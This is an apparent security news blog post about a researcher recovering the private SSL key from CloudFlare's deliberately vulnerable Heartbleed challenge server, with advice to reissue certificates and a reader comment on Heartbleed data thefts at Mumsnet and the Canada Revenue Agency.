At the end of last week, engineers at CloudFlare said that they had been unable to exploit the Heartbleed bug to steal SSL keys from a server:
We’ve spent much of the time running extensive tests to figure out what can be exposed via Heartbleed and, specifically, to understand if private SSL key data was at risk.
Here’s the good news: after extensive testing on our software stack, we have been unable to successfully use Heartbleed on a vulnerable server to retrieve any private key data.
So, they set the internet a challenge – putting a test server online and inviting people to try to grab its private server keys by exploiting the so-called Heartbleed vulnerability in OpenSSL.
This site was created by CloudFlare engineers to be intentionally vulnerable to heartbleed. It is not running behind CloudFlare’s network. We encourage everyone to attempt to get the private key from this website. If someone is able to steal the private key from this site using heartbleed, we will post the full details here.
Well, they soon got an answer. And it wasn’t the good news we might have all wished for.
Within hours, software engineer Fedor Indutny was revealed to have recovered the private keys from the web server.
Just cracked @CloudFlare ’s challenge: https://t.co/8ZPSxyKF4D . I wonder when they’ll update the page.
— indutny (@indutny) April 11, 2014
Indutny claimed on Twitter that it took a script he wrote for the purpose took just three hours to hunt down the private SSL key.
CloudFlare confirmed Indutny’s success, and speculated that because they had rebooted the server at one point that might have contributed to the challenger’s successful exfiltration of their server’s secret key.
One thing is clear. If you administer a server and have so far put off revoking and reissuing your SSL certificates, it might be time to think again.
If you don’t, you could be putting your users and online customers in jeopardy.
Further reading:
- The NSA knew about Heartbleed bug for two years, claims report
- Heartbleed bug explained by xkcd in a way anyone can understand
- In the wake of Heartbleed, watch out for phishing attacks disguised as password reset emails
- Here’s some really bad Heartbleed bug advice about changing your passwords
- Heartbleed OpenSSL bug: An FAQ for Mac, iPhone and iPad users
- Did the Heartbleed bug leak your Yahoo password?
- The Heartbleed bug: serious vulnerability found in OpenSSL cryptographic software library
Yes.. and interestingly, BBC reports _this_ (today I guess – when I saw it anyway):
A leading UK site for parents and the Canadian tax authority have both announced they have had data stolen by hackers exploiting the Heartbleed bug.
Mumsnet – which says it has 1.5 million registered members – said that it believed that the cyber thieves may have obtained passwords and personal messages before it patched its site.
and
The Canada Revenue Agency said that 900 people's social insurance numbers had been stolen.
I cannot help but wonder why they were waiting around… then I snap back to what little reality I have and realise that most corporations, organisations and people in general do not take this type of thing seriously enough (I somehow doubt it was exploited right after it was made public … Mumsnet suggested that they found out last Friday). Especially shameful for the Canadian one, though (one can hope it isn't maybe the NSA that thought if they had social insurance numbers they could make use of it to prevent an ideal – terror etc. – just like everything else they do is given that reason)…
Either way, I guess both organisations will have to deal with it and that includes the major problems (misery and fear of consequences) for those it will affect (one can hope they both DO in fact take responsibility and address it appropriately).